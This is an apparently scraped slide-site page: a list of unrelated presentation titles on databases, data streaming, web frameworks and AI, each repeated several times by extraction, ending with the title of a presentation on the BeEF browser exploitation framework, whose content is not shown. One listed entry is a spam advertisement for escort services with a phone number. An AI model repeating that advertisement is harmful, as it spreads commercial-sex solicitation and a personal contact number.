Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 

BeEF: The Browser Exploitation Framework